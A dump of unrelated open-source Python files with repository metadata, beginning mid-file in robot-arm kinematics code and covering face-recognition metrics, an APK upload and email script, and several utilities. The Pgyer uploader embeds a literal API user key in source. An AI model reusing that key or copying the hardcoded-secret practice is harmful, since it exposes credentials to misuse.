self.servos['elbow'].setTorqueEnable(self.motion_enable) if self.servos['wrist_x'] is not None: self.servos['wrist_x'].setTorqueEnable(self.motion_enable) if self.servos['wrist_y'] is not None: self.servos['wrist_y'].setTorqueEnable(self.motion_enable) def setWristGoalPosition(self, pos): self.ik.setGoal(pos) self.ik_dirty = True def setWristGoalDirection(self, normal): self.ik.setWristDir(normal) self.ik_dirty = True def getIKPose(self): if self.ik_dirty and self.ik.valid: # Construct geometry of arm from IK state main_arm = self.ik.elbow - self.ik.originpl arm_vert_angle = sigangle(main_arm, vertical) forearm = self.ik.wristpl - self.ik.elbow elbow_angle = angle_between(main_arm, forearm) # Solve actuator angle for given elbow angle # Base angle is between the main arm and actuator base_angle = self.physsolver.inverse_forearm(elbow_angle) actuator_angle = arm_vert_angle - base_angle self.ik_pose = ArmPose( self.cfg, swing_angle = self.ik.swing, # angles from vertical shoulder_angle = arm_vert_angle, actuator_angle = actuator_angle, # angle between the main arm and forearm elbow_angle = elbow_angle, elbow2D = self.ik.elbow, wrist2D = self.ik.wristpl, effector2D = self.ik.goalpl, effector = self.ik.goal, wrist_x = self.ik.wrist_x, wrist_y = self.ik.wrist_y ) return self.ik_pose def pollServos(self): """Poll the real-world servo positions""" for servo in self.servos.itervalues(): if servo is not None: newPos = servo.getPosition() if type(newPos) is float: servo.data['pos'] = newPos def clearPositionError(self): """Clears the servo's position-error accumulators""" for servo in self.servos.itervalues(): if servo is not None and servo.protocol == 1: servo.data['error'] = 0.0 def getRealPose(self): """Retrieve the real-world arm pose, or None if not all servos are connected. """ if any([servo is None for servo in self.servos.itervalues()]): return None # This whole function is essentially just FK based on the known servo # angles swing_servo = self.servos['swing'].data['pos'] elevator_servo = self.servos['shoulder'].data['pos'] actuator_servo = self.servos['elbow'].data['pos'] wrist_x_servo = self.servos['wrist_x'].data['pos'] wrist_y_servo = self.servos['wrist_y'].data['pos'] # Find the internal arm-pose angles for the given servo positions swing_angle = ArmPose.calcSwingAngle(swing_servo) elevator_angle = ArmPose.calcElevatorAngle(elevator_servo) actuator_angle = ArmPose.calcActuatorAngle(actuator_servo) wrist_x_angle = ArmPose.calcWristXAngle(wrist_x_servo) wrist_y_angle = ArmPose.calcWristYAngle(wrist_y_servo) # Solve elbow angle for given actuator and elevator angles # (this is the angle from the elevator arm's direction to the forearm's) elbow_angle = self.physsolver.solve_forearm(elevator_angle, actuator_angle) # FK positions from config and angles offset = self.cfg.shoulder_offset shoulder2D = np.array([offset[1], 0]) elbow2D = shoulder2D + rotate(vertical, elevator_angle)*self.cfg.main_length wrist2D = elbow2D + rotate(vertical, elevator_angle + elbow_angle)*self.cfg.forearm_length effector2D = wrist2D + [self.cfg.wrist_length, 0] # 3D Effector calculation is a little more involved td = rotate([offset[0], effector2D[0]], swing_angle) effector = np.array([td[0], effector2D[1], td[1]]) pose = ArmPose( self.cfg, swing_angle, elevator_angle, actuator_angle, elbow_angle, elbow2D, wrist2D, effector2D, effector, wrist_x_angle, wrist_y_angle) return pose def setTargetPose(self, new_pose): self.target_pose = new_pose def tick(self): if self.target_pose is not None: if self.motion_enable: # Drive servos gain = 0.1 if self.servos['swing'] is not None: s = self.servos['swing'] pos = s.data['pos'] target = self.target_pose.getServoSwing() # err = min(10, pos-target) # s.data['error'] += err*gain s.setGoalPosition(target) if self.servos['shoulder'] is not None: s = self.servos['shoulder'] # cumulative error pos = s.data['pos'] target = self.target_pose.getServoElevator() err = min(10, pos-target) s.data['error'] += err*gain s.data['error'] = np.clip(s.data['error'], -ERRORLIM, ERRORLIM) s.setGoalPosition(target - s.data['error']) if self.servos['elbow'] is not None: s = self.servos['elbow'] pos = s.data['pos'] target = self.target_pose.getServoActuator() err = min(10, pos-target) s.data['error'] += err*gain s.data['error'] = np.clip(s.data['error'], -ERRORLIM, ERRORLIM) s.setGoalPosition(target - s.data['error']) if self.servos['wrist_x'] is not None: self.servos['wrist_x'].setGoalPosition(self.target_pose.getServoWristX()) if self.servos['wrist_y'] is not None: self.servos['wrist_y'].setGoalPosition(self.target_pose.getServoWristY())
facerec-master/py/facerec/distance.py
ArianeFire/HaniCam
776
9029
<reponame>ArianeFire/HaniCam<filename>facerec-master/py/facerec/distance.py #!/usr/bin/env python # -*- coding: utf-8 -*- # Copyright (c) <NAME>. All rights reserved. # Licensed under the BSD license. See LICENSE file in the project root for full license information. import numpy as np class AbstractDistance(object): def __init__(self, name): self._name = name def __call__(self,p,q): raise NotImplementedError("Every AbstractDistance must implement the __call__ method.") @property def name(self): return self._name def __repr__(self): return self._name class EuclideanDistance(AbstractDistance): def __init__(self): AbstractDistance.__init__(self,"EuclideanDistance") def __call__(self, p, q): p = np.asarray(p).flatten() q = np.asarray(q).flatten() return np.sqrt(np.sum(np.power((p-q),2))) class CosineDistance(AbstractDistance): """ Negated Mahalanobis Cosine Distance. Literature: "Studies on sensitivity of face recognition performance to eye location accuracy.". Master Thesis (2004), Wang """ def __init__(self): AbstractDistance.__init__(self,"CosineDistance") def __call__(self, p, q): p = np.asarray(p).flatten() q = np.asarray(q).flatten() return -np.dot(p.T,q) / (np.sqrt(np.dot(p,p.T)*np.dot(q,q.T))) class NormalizedCorrelation(AbstractDistance): """ Calculates the NormalizedCorrelation Coefficient for two vectors. Literature: "Multi-scale Local Binary Pattern Histogram for Face Recognition". PhD (2008). Chi Ho Chan, University Of Surrey. """ def __init__(self): AbstractDistance.__init__(self,"NormalizedCorrelation") def __call__(self, p, q): p = np.asarray(p).flatten() q = np.asarray(q).flatten() pmu = p.mean() qmu = q.mean() pm = p - pmu qm = q - qmu return 1.0 - (np.dot(pm, qm) / (np.sqrt(np.dot(pm, pm)) * np.sqrt(np.dot(qm, qm)))) class ChiSquareDistance(AbstractDistance): """ Negated Mahalanobis Cosine Distance. Literature: "Studies on sensitivity of face recognition performance to eye location accuracy.". Master Thesis (2004), Wang """ def __init__(self): AbstractDistance.__init__(self,"ChiSquareDistance") def __call__(self, p, q): p = np.asarray(p).flatten() q = np.asarray(q).flatten() bin_dists = (p-q)**2 / (p+q+np.finfo('float').eps) return np.sum(bin_dists) class HistogramIntersection(AbstractDistance): def __init__(self): AbstractDistance.__init__(self,"HistogramIntersection") def __call__(self, p, q): p = np.asarray(p).flatten() q = np.asarray(q).flatten() return np.sum(np.minimum(p,q)) class BinRatioDistance(AbstractDistance): """ Calculates the Bin Ratio Dissimilarity. Literature: "Use Bin-Ratio Information for Category and Scene Classification" (2010), Xie et.al. """ def __init__(self): AbstractDistance.__init__(self,"BinRatioDistance") def __call__(self, p, q): p = np.asarray(p).flatten() q = np.asarray(q).flatten() a = np.abs(1-np.dot(p,q.T)) # NumPy needs np.dot instead of * for reducing to tensor b = ((p-q)**2 + 2*a*(p*q))/((p+q)**2+np.finfo('float').eps) return np.abs(np.sum(b)) class L1BinRatioDistance(AbstractDistance): """ Calculates the L1-Bin Ratio Dissimilarity. Literature: "Use Bin-Ratio Information for Category and Scene Classification" (2010), Xie et.al. """ def __init__(self): AbstractDistance.__init__(self,"L1-BinRatioDistance") def __call__(self, p, q): p = np.asarray(p, dtype=np.float).flatten() q = np.asarray(q, dtype=np.float).flatten() a = np.abs(1-np.dot(p,q.T)) # NumPy needs np.dot instead of * for reducing to tensor b = ((p-q)**2 + 2*a*(p*q)) * abs(p-q) / ((p+q)**2+np.finfo('float').eps) return np.abs(np.sum(b)) class ChiSquareBRD(AbstractDistance): """ Calculates the ChiSquare-Bin Ratio Dissimilarity. Literature: "Use Bin-Ratio Information for Category and Scene Classification" (2010), Xie et.al. """ def __init__(self): AbstractDistance.__init__(self,"ChiSquare-BinRatioDistance") def __call__(self, p, q): p = np.asarray(p, dtype=np.float).flatten() q = np.asarray(q, dtype=np.float).flatten() a = np.abs(1-np.dot(p,q.T)) # NumPy needs np.dot instead of * for reducing to tensor b = ((p-q)**2 + 2*a*(p*q)) * (p-q)**2 / ((p+q)**3+np.finfo('float').eps) return np.abs(np.sum(b))
pgyer_uploader.py
elina8013/android_demo
666
9030
<filename>pgyer_uploader.py #!/usr/bin/python #coding=utf-8 import os import requests import time import re from datetime import datetime import urllib2 import json import mimetypes import smtplib from email.MIMEText import MIMEText from email.MIMEMultipart import MIMEMultipart # configuration for pgyer USER_KEY = "f605b7c7826690f796078e3dd23a60d5" API_KEY = "<KEY>" PGYER_UPLOAD_URL = "https://www.pgyer.com/apiv1/app/upload" repo_path = 'C:/Users/Administrator/.jenkins/workspace/Demo/app' repo_url = 'https://github.com/r17171709/iite_test' ipa_path = "C:/Users/Administrator/.jenkins/workspace/Demo/app/build/outputs/apk/app-release.apk" update_description = "版本更新测试" def parseUploadResult(jsonResult): print 'post response: %s' % jsonResult resultCode = jsonResult['code'] send_Email(jsonResult) if resultCode != 0: print "Upload Fail!" raise Exception("Reason: %s" % jsonResult['message']) print "Upload Success" appKey = jsonResult['data']['appKey'] appDownloadPageURL = "https://www.pgyer.com/%s" % appKey print "appDownloadPage: %s" % appDownloadPageURL return appDownloadPageURL def uploadIpaToPgyer(ipaPath, updateDescription): print "Begin to upload ipa to Pgyer: %s" % ipaPath headers = {'enctype': 'multipart/form-data'} payload = { 'uKey': USER_KEY, '_api_key': API_KEY, 'publishRange': '2', # 直接发布 'isPublishToPublic': '2', # 不发布到广场 'updateDescription': updateDescription # 版本更新描述 } try_times = 0 while try_times < 5: try: print "uploading ... %s" % datetime.now() ipa_file = {'file': open(ipaPath, 'rb')} r = requests.post(PGYER_UPLOAD_URL, headers = headers, files = ipa_file, data = payload ) assert r.status_code == requests.codes.ok result = r.json() appDownloadPageURL = parseUploadResult(result) return appDownloadPageURL except requests.exceptions.ConnectionError: print "requests.exceptions.ConnectionError occured!" time.sleep(60) print "try again ... %s" % datetime.now() try_times += 1 except Exception as e: print "Exception occured: %s" % str(e) time.sleep(60) print "try again ... %s" % datetime.now() try_times += 1 if try_times >= 5: raise Exception("Failed to upload ipa to Pgyer, retried 5 times.") def parseQRCodeImageUrl(appDownloadPageURL): try_times = 0 while try_times < 3: try: response = requests.get(appDownloadPageURL) regex = '<img src=\"(.*?)\" style=' m = re.search(regex, response.content) assert m is not None appQRCodeURL = m.group(1) print "appQRCodeURL: %s" % appQRCodeURL return appQRCodeURL except AssertionError: try_times += 1 time.sleep(60) print "Can not locate QRCode image. retry ... %s: %s" % (try_times, datetime.now()) if try_times >= 3: raise Exception("Failed to locate QRCode image in download page, retried 3 times.") def saveQRCodeImage(appDownloadPageURL, output_folder): appQRCodeURL = parseQRCodeImageUrl(appDownloadPageURL) response = requests.get(appQRCodeURL) qr_image_file_path = os.path.join(output_folder, 'QRCode.png') if response.status_code == 200: with open(qr_image_file_path, 'wb') as f: f.write(response.content) print 'Save QRCode image to file: %s' % qr_image_file_path def main(): appDownloadPageURL = uploadIpaToPgyer(ipa_path, update_description) try: output_folder = os.path.dirname(ipa_path) saveQRCodeImage(appDownloadPageURL, output_folder) except Exception as e: print "Exception occured: %s" % str(e) #获取 最后一次 提交git的信息 def getCommitInfo(): #方法一 使用 python 库 前提是 当前分支 在服务器上存在 # repo = Gittle(repo_path, origin_uri=repo_url) # commitInfo = repo.commit_info(start=0, end=1) # lastCommitInfo = commitInfo[0] #方法二 直接 cd 到 目录下 git log -1 打印commit 信息 os.chdir(repo_path); lastCommitInfo = run_cmd('git log -1') return lastCommitInfo #发送邮件 def send_Email(json_result): print '*******start to send mail****' appName = json_result['data']['appName'] appKey = json_result['data']['appKey'] appVersion = json_result['data']['appVersion'] appBuildVersion = json_result['data']['appBuildVersion'] appShortcutUrl = json_result['data']['appShortcutUrl'] #邮件接受者 mail_receiver = ['<EMAIL>'] #根据不同邮箱配置 host,user,和pwd mail_host = 'smtp.139.com' mail_port = 465 mail_user = '<EMAIL>' mail_pwd = '<PASSWORD>' mail_to = ','.join(mail_receiver) msg = MIMEMultipart() environsString = '<p><h3>本次打包相关信息</h3><p>' # environsString += '<p>ipa 包下载地址 : ' + 'wudizhi' + '<p>' environsString += '<p>蒲公英安装地址 : ' + 'http://www.pgyer.com/' + str(appShortcutUrl) + '<p><p><p><p>' # environsString += '<li><a href="itms-services://?action=download-manifest&url=https://ssl.pgyer.com/app/plist/' + str(appKey) + '"></a>点击直接安装</li>' environsString += '<p><h3>本次git提交相关信息</h3><p>' #获取git最后一次提交信息 lastCommitInfo = getCommitInfo() # #提交人 # committer = lastCommitInfo['committer']['raw'] # #提交信息 # description = lastCommitInfo['description'] environsString += '<p>' + '<font color="red">' + lastCommitInfo + '</font>' + '<p>' # environsString += '<p>Description:' + '<font color="red">' + description + '</font>' + '<p>' message = environsString body = MIMEText(message, _subtype='html', _charset='utf-8') msg["Accept-Language"]="zh-CN" msg["Accept-Charset"]="ISO-8859-1,utf-8" msg.attach(body) msg['To'] = mail_to msg['from'] = '<EMAIL>' msg['subject'] = 'Android APP 最新打包文件' try: s = smtplib.SMTP() # 设置为调试模式,就是在会话过程中会有输出信息 s.set_debuglevel(1) s.connect(mail_host) s.starttls() # 创建 SSL 安全加密 链接 s.login(mail_user, mail_pwd) s.sendmail(mail_user, mail_receiver, msg.as_string()) s.close() print '*******mail send ok****' except Exception, e: print e def run_cmd(cmd): try: import subprocess except ImportError: _, result_f, error_f = os.popen3(cmd) else: process = subprocess.Popen(cmd, shell = True, stdout = subprocess.PIPE, stderr = subprocess.PIPE) result_f, error_f = process.stdout, process.stderr errors = error_f.read() if errors: pass result_str = result_f.read().strip() if result_f : result_f.close() if error_f : error_f.close() return result_str if __name__ == '__main__': main()
fastseg/model/utils.py
SeockHwa/Segmentation_mobileV3
274
9052
<filename>fastseg/model/utils.py<gh_stars>100-1000 import torch.nn as nn from .efficientnet import EfficientNet_B4, EfficientNet_B0 from .mobilenetv3 import MobileNetV3_Large, MobileNetV3_Small def get_trunk(trunk_name): """Retrieve the pretrained network trunk and channel counts""" if trunk_name == 'efficientnet_b4': backbone = EfficientNet_B4(pretrained=True) s2_ch = 24 s4_ch = 32 high_level_ch = 1792 elif trunk_name == 'efficientnet_b0': backbone = EfficientNet_B0(pretrained=True) s2_ch = 16 s4_ch = 24 high_level_ch = 1280 elif trunk_name == 'mobilenetv3_large': backbone = MobileNetV3_Large(pretrained=True) s2_ch = 16 s4_ch = 24 high_level_ch = 960 elif trunk_name == 'mobilenetv3_small': backbone = MobileNetV3_Small(pretrained=True) s2_ch = 16 s4_ch = 16 high_level_ch = 576 else: raise ValueError('unknown backbone {}'.format(trunk_name)) return backbone, s2_ch, s4_ch, high_level_ch class ConvBnRelu(nn.Module): """Convenience layer combining a Conv2d, BatchNorm2d, and a ReLU activation. Original source of this code comes from https://github.com/lingtengqiu/Deeperlab-pytorch/blob/master/seg_opr/seg_oprs.py """ def __init__(self, in_planes, out_planes, kernel_size, stride=1, padding=0, norm_layer=nn.BatchNorm2d): super(ConvBnRelu, self).__init__() self.conv = nn.Conv2d(in_planes, out_planes, kernel_size=kernel_size, stride=stride, padding=padding, bias=False) self.bn = norm_layer(out_planes, eps=1e-5) self.relu = nn.ReLU(inplace=True) def forward(self, x): x = self.conv(x) x = self.bn(x) x = self.relu(x) return x
cmsplugin_cascade/migrations/0007_add_proxy_models.py
teklager/djangocms-cascade
139
9063
from django.db import migrations, models class Migration(migrations.Migration): dependencies = [ ('cmsplugin_cascade', '0006_bootstrapgallerypluginmodel'), ] operations = [ ]
theonionbox/tob/credits.py
ralphwetzel/theonionbox
120
9064
Credits = [ ('Bootstrap', 'https://getbootstrap.com', 'The Bootstrap team', 'MIT'), ('Bottle', 'http://bottlepy.org', '<NAME>', 'MIT'), ('Cheroot', 'https://github.com/cherrypy/cheroot', 'CherryPy Team', 'BSD 3-Clause "New" or "Revised" License'), ('Click', 'https://github.com/pallets/click', 'Pallets', 'BSD 3-Clause "New" or "Revised" License'), ('ConfigUpdater', 'https://github.com/pyscaffold/configupdater', '<NAME>', 'MIT'), ('Glide', 'https://github.com/glidejs/glide', '@jedrzejchalubek', 'MIT'), ('JQuery', 'https://jquery.com', 'The jQuery Foundation', 'MIT'), ('jquery.pep.js', 'http://pep.briangonzalez.org', '@briangonzalez', 'MIT'), ('js-md5', 'https://github.com/emn178/js-md5', '@emn178', 'MIT'), ('PySocks', 'https://github.com/Anorov/PySocks', '@Anorov', 'Custom DAN HAIM'), ('RapydScript-NG', 'https://github.com/kovidgoyal/rapydscript-ng', '@kovidgoyal', 'BSD 2-Clause "Simplified" License'), ('Requests', 'https://requests.kennethreitz.org', '<NAME>', 'Apache License, Version 2.0'), ('scrollMonitor', 'https://github.com/stutrek/scrollmonitor', '@stutrek', 'MIT'), ('Smoothie Charts', 'https://github.com/joewalnes/smoothie', '@drewnoakes', 'MIT'), ('stem', 'https://stem.torproject.org', '<NAME> and The Tor Project', 'GNU LESSER GENERAL PUBLIC LICENSE') ]
pypeln/thread/api/to_iterable_thread_test.py
quarckster/pypeln
1,281
9111
<filename>pypeln/thread/api/to_iterable_thread_test.py import typing as tp from unittest import TestCase import hypothesis as hp from hypothesis import strategies as st import pypeln as pl import cytoolz as cz MAX_EXAMPLES = 10 T = tp.TypeVar("T") @hp.given(nums=st.lists(st.integers())) @hp.settings(max_examples=MAX_EXAMPLES) def test_from_to_iterable(nums: tp.List[int]): nums_pl = nums nums_pl = pl.thread.from_iterable(nums_pl) nums_pl = cz.partition_all(10, nums_pl) nums_pl = pl.thread.map(sum, nums_pl) nums_pl = pl.thread.to_iterable(nums_pl) nums_pl = list(nums_pl) nums_py = nums nums_py = cz.partition_all(10, nums_py) nums_py = map(sum, nums_py) nums_py = list(nums_py) assert nums_py == nums_pl
pulsar/datadog_checks/pulsar/check.py
divyamamgai/integrations-extras
158
9122
<filename>pulsar/datadog_checks/pulsar/check.py from datadog_checks.base import ConfigurationError, OpenMetricsBaseCheck EVENT_TYPE = SOURCE_TYPE_NAME = 'pulsar' class PulsarCheck(OpenMetricsBaseCheck): """ PulsarCheck derives from AgentCheck that provides the required check method """ def __init__(self, name, init_config, instances=None): instance = instances[0] url = instance.get('prometheus_url') if url is None: raise ConfigurationError("Unable to find prometheus_url in config file.") self.NAMESPACE = 'kesque.pulsar' self.metrics_mapper = { 'pulsar_consumer_available_permits': 'consumer.available_permits', 'pulsar_consumer_blocked_on_unacked_messages': 'consumer.blocked_on_unacked_messages', 'pulsar_consumer_msg_rate_out': 'consumer.msg_rate_out', 'pulsar_consumer_msg_rate_redeliver': 'consumer.msg_rate_redeliver', 'pulsar_consumer_msg_throughput_out': 'consumer.msg_throughput_out', 'pulsar_consumer_unacked_messages': 'consumer.unacked_messages', 'pulsar_consumers_count': 'consumers_count', 'pulsar_entry_size_count': 'entry_size_count', 'pulsar_entry_size_le_100_kb': 'entry_size_le_100_kb', 'pulsar_entry_size_le_128': 'entry_size_le_128', 'pulsar_entry_size_le_16_kb': 'entry_size_le_16_kb', 'pulsar_entry_size_le_1_kb': 'entry_size_le_1_kb', 'pulsar_entry_size_le_1_mb': 'entry_size_le_1_mb', 'pulsar_entry_size_le_2_kb': 'entry_size_le_2_kb', 'pulsar_entry_size_le_4_kb': 'entry_size_le_4_kb', 'pulsar_entry_size_le_512': 'entry_size_le_512', 'pulsar_entry_size_le_overflow': 'entry_size_le_overflow', 'pulsar_entry_size_sum': 'entry_size_sum', 'pulsar_in_bytes_total': 'in_bytes_total', 'pulsar_in_messages_total': 'in_messages_total', 'pulsar_msg_backlog': 'msg_backlog', 'pulsar_out_bytes_total': 'out_bytes_total', 'pulsar_out_messages_total': 'out_messages_total', 'pulsar_producers_count': 'producers_count', 'pulsar_rate_in': 'rate_in', 'pulsar_rate_out': 'rate_out', 'pulsar_replication_backlog': 'replication.backlog', 'pulsar_replication_rate_in': 'replication.rate_in', 'pulsar_replication_rate_out': 'replication.rate_out', 'pulsar_replication_throughput_in': 'replication.throughput_in', 'pulsar_replication_throughput_out': 'replication.throughput_out', 'pulsar_storage_backlog_quota_limit': 'storage.backlog_quota_limit', 'pulsar_storage_backlog_size': 'storage.backlog_size', 'pulsar_storage_read_rate': 'storage.read_rate', 'pulsar_storage_offloaded_size': 'storage.offloaded_size', 'pulsar_storage_size': 'storage.size', 'pulsar_storage_write_latency_count': 'storage.write_latency_count', 'pulsar_storage_write_latency_le_0_5': 'storage.write_latency_le_0_5', 'pulsar_storage_write_latency_le_1': 'storage.write_latency_le_1', 'pulsar_storage_write_latency_le_10': 'storage.write_latency_le_10', 'pulsar_storage_write_latency_le_100': 'storage.write_latency_le_100', 'pulsar_storage_write_latency_le_1000': 'storage.write_latency_le_1000', 'pulsar_storage_write_latency_le_20': 'storage.write_latency_le_20', 'pulsar_storage_write_latency_le_200': 'storage.write_latency_le_200', 'pulsar_storage_write_latency_le_5': 'storage.write_latency_le_5', 'pulsar_storage_write_latency_le_50': 'storage.write_latency_le_50', 'pulsar_storage_write_latency_overflow': 'storage.write_latency_overflow', 'pulsar_storage_write_latency_sum': 'storage.write_latency_sum', 'pulsar_storage_write_rate': 'storage.write_rate', 'pulsar_subscription_back_log': 'subscription.back_log', 'pulsar_subscription_back_log_no_delayed': 'subscription.back_log_no_delayed', 'pulsar_subscription_blocked_on_unacked_messages': 'subscription.blocked_on_unacked_messages', 'pulsar_subscription_delayed': 'subscription.delayed', 'pulsar_subscription_msg_rate_out': 'subscription.msg_rate_out', 'pulsar_subscription_msg_rate_redeliver': 'subscription.msg_rate_redeliver', 'pulsar_subscription_msg_throughput_out': 'subscription.msg_throughput_out', 'pulsar_subscription_unacked_messages': 'subscription.unacked_messages', 'pulsar_subscriptions_count': 'subscriptions.count', 'pulsar_throughput_in': 'throughput_in', 'pulsar_throughput_out': 'throughput_out', 'pulsar_topics_count': 'topics_count', 'scrape_duration_seconds': 'scrape_duration_seconds', 'scrape_samples_post_metric_relabeling': 'scrape_samples_post_metric_relabeling', 'scrape_samples_scraped': 'scrape_samples_scraped', 'topic_load_times': 'topic_load_times', 'topic_load_times_count': 'topic_load_times_count', 'topic_load_times_sum': 'topic_load_times_sum', 'up': 'broker.up', } instance.update( { 'prometheus_url': url, 'namespace': self.NAMESPACE, 'metrics': [self.metrics_mapper], 'send_distribution_counts_as_monotonic': instance.get('send_distribution_counts_as_monotonic', True), 'send_distribution_sums_as_monotonic': instance.get('send_distribution_sums_as_monotonic', True), } ) super(PulsarCheck, self).__init__(name, init_config, instances)
evaluation/datasets/build_dataset_images.py
hsiehkl/pdffigures2
296
9127
<filename>evaluation/datasets/build_dataset_images.py import argparse from os import listdir, mkdir from os.path import join, isdir from subprocess import call import sys import datasets from shutil import which """ Script to use pdftoppm to turn the pdfs into single images per page """ def get_images(pdf_dir, output_dir, dpi, mono=True): if which("pdftoppm") is None: raise ValueError("Requires executable pdftopmm to be on the PATH") if not isdir(output_dir): print("Making %s to store rasterized PDF pages" % output_dir) mkdir(output_dir) if not isdir(pdf_dir): raise ValueError(pdf_dir + " is not a directory") pdf_doc_ids = [x.split(".pdf")[0] for x in listdir(pdf_dir)] already_have = set() for filename in listdir(output_dir): if "-page" not in filename: raise ValueError() doc_id = filename.split("-page")[0] if doc_id not in pdf_doc_ids: raise ValueError("doc id %s in output dir not found in pdfs" % doc_id) already_have.add(doc_id) if len(already_have) != 0: print("Already have %d docs" % len(already_have)) num_pdfs = len(listdir(pdf_dir)) for (i, pdfname) in enumerate(listdir(pdf_dir)): if not pdfname.endswith(".pdf"): raise ValueError() doc_id = pdfname[:-4] if doc_id in already_have: continue print("Creating images for pdf %s (%d / %d)" % (pdfname, i + 1, num_pdfs)) if (mono): args = ["pdftoppm", "-gray", "-r", str(dpi), "-aa", "no", "-aaVector", "no", "-cropbox", join(pdf_dir, pdfname), join(output_dir, doc_id + "-page")] else: args = ["pdftoppm", "-jpeg", "-r", str(dpi), "-cropbox", join(pdf_dir, pdfname), join(output_dir, doc_id + "-page")] retcode = call(args) if retcode != 0: raise ValueError("Bad return code for <%s> (%d)", " ".join(args), retcode) if __name__ == "__main__": parser = argparse.ArgumentParser(description='Cache rasterized page images for a dataset') parser.add_argument("dataset", choices=datasets.DATASETS.keys(), help="target dataset") parser.add_argument("color", choices=["gray", "color"], help="kind of images to render") args = parser.parse_args() dataset = datasets.get_dataset(args.dataset) print("Running on dataset: " + dataset.name) if args.color == "gray": get_images(dataset.pdf_dir, dataset.page_images_gray_dir, dataset.IMAGE_DPI, True) elif args.color == "color": get_images(dataset.pdf_dir, dataset.page_images_color_dir, dataset.COLOR_IMAGE_DPI, False) else: exit(1)
python_packages_static/flopy/mf6/__init__.py
usgs/neversink_workflow
351
9136
<gh_stars>100-1000 # imports from . import coordinates from . import data from .modflow import * from . import utils from .data import mfdatascalar, mfdatalist, mfdataarray from .mfmodel import MFModel from .mfbase import ExtFileAction
colbert/parameters.py
techthiyanes/ColBERT
421
9150
import torch DEVICE = torch.device("cuda") SAVED_CHECKPOINTS = [32*1000, 100*1000, 150*1000, 200*1000, 300*1000, 400*1000] SAVED_CHECKPOINTS += [10*1000, 20*1000, 30*1000, 40*1000, 50*1000, 60*1000, 70*1000, 80*1000, 90*1000] SAVED_CHECKPOINTS += [25*1000, 50*1000, 75*1000] SAVED_CHECKPOINTS = set(SAVED_CHECKPOINTS)
venv/Lib/site-packages/rivescript/inheritance.py
Hazemcodes/GimmyBot
154
9174
# RiveScript-Python # # This code is released under the MIT License. # See the "LICENSE" file for more information. # # https://www.rivescript.com/ def get_topic_triggers(rs, topic, thats, depth=0, inheritance=0, inherited=False): """Recursively scan a topic and return a list of all triggers. Arguments: rs (RiveScript): A reference to the parent RiveScript instance. topic (str): The original topic name. thats (bool): Are we getting triggers for 'previous' replies? depth (int): Recursion step counter. inheritance (int): The inheritance level counter, for topics that inherit other topics. inherited (bool): Whether the current topic is inherited by others. Returns: []str: List of all triggers found. """ # Break if we're in too deep. if depth > rs._depth: rs._warn("Deep recursion while scanning topic inheritance") # Keep in mind here that there is a difference between 'includes' and # 'inherits' -- topics that inherit other topics are able to OVERRIDE # triggers that appear in the inherited topic. This means that if the top # topic has a trigger of simply '*', then NO triggers are capable of # matching in ANY inherited topic, because even though * has the lowest # priority, it has an automatic priority over all inherited topics. # # The getTopicTriggers method takes this into account. All topics that # inherit other topics will have their triggers prefixed with a fictional # {inherits} tag, which would start at {inherits=0} and increment if this # topic has other inheriting topics. So we can use this tag to make sure # topics that inherit things will have their triggers always be on top of # the stack, from inherits=0 to inherits=n. # Important info about the depth vs inheritance params to this function: # depth increments by 1 each time this function recursively calls itrs. # inheritance increments by 1 only when this topic inherits another # topic. # # This way, '> topic alpha includes beta inherits gamma' will have this # effect: # alpha and beta's triggers are combined together into one matching # pool, and then those triggers have higher matching priority than # gamma's. # # The inherited option is True if this is a recursive call, from a topic # that inherits other topics. This forces the {inherits} tag to be added # to the triggers. This only applies when the top topic 'includes' # another topic. rs._say("\tCollecting trigger list for topic " + topic + "(depth=" + str(depth) + "; inheritance=" + str(inheritance) + "; " + "inherited=" + str(inherited) + ")") # topic: the name of the topic # depth: starts at 0 and ++'s with each recursion # Topic doesn't exist? if not topic in rs._topics: rs._warn("Inherited or included topic {} doesn't exist or has no triggers".format( topic )) return [] # Collect an array of triggers to return. triggers = [] # Get those that exist in this topic directly. inThisTopic = [] if not thats: # The non-that structure is {topic}->[array of triggers] if topic in rs._topics: for trigger in rs._topics[topic]: inThisTopic.append([ trigger["trigger"], trigger ]) else: # The 'that' structure is: {topic}->{cur trig}->{prev trig}->{trig info} if topic in rs._thats.keys(): for curtrig in rs._thats[topic].keys(): for previous, pointer in rs._thats[topic][curtrig].items(): inThisTopic.append([ pointer["trigger"], pointer ]) # Does this topic include others? if topic in rs._includes: # Check every included topic. for includes in rs._includes[topic]: rs._say("\t\tTopic " + topic + " includes " + includes) triggers.extend(get_topic_triggers(rs, includes, thats, (depth + 1), inheritance, True)) # Does this topic inherit others? if topic in rs._lineage: # Check every inherited topic. for inherits in rs._lineage[topic]: rs._say("\t\tTopic " + topic + " inherits " + inherits) triggers.extend(get_topic_triggers(rs, inherits, thats, (depth + 1), (inheritance + 1), False)) # Collect the triggers for *this* topic. If this topic inherits any # other topics, it means that this topic's triggers have higher # priority than those in any inherited topics. Enforce this with an # {inherits} tag. if topic in rs._lineage or inherited: for trigger in inThisTopic: rs._say("\t\tPrefixing trigger with {inherits=" + str(inheritance) + "}" + trigger[0]) triggers.append(["{inherits=" + str(inheritance) + "}" + trigger[0], trigger[1]]) else: triggers.extend(inThisTopic) return triggers def get_topic_tree(rs, topic, depth=0): """Given one topic, get the list of all included/inherited topics. :param str topic: The topic to start the search at. :param int depth: The recursion depth counter. :return []str: Array of topics. """ # Break if we're in too deep. if depth > rs._depth: rs._warn("Deep recursion while scanning topic trees!") return [] # Collect an array of all topics. topics = [topic] # Does this topic include others? if topic in rs._includes: # Try each of these. for includes in sorted(rs._includes[topic]): topics.extend(get_topic_tree(rs, includes, depth + 1)) # Does this topic inherit others? if topic in rs._lineage: # Try each of these. for inherits in sorted(rs._lineage[topic]): topics.extend(get_topic_tree(rs, inherits, depth + 1)) return topics
training/horovod/base/horovod_wrapper.py
thehardikv/ai-platform-samples
418
9194
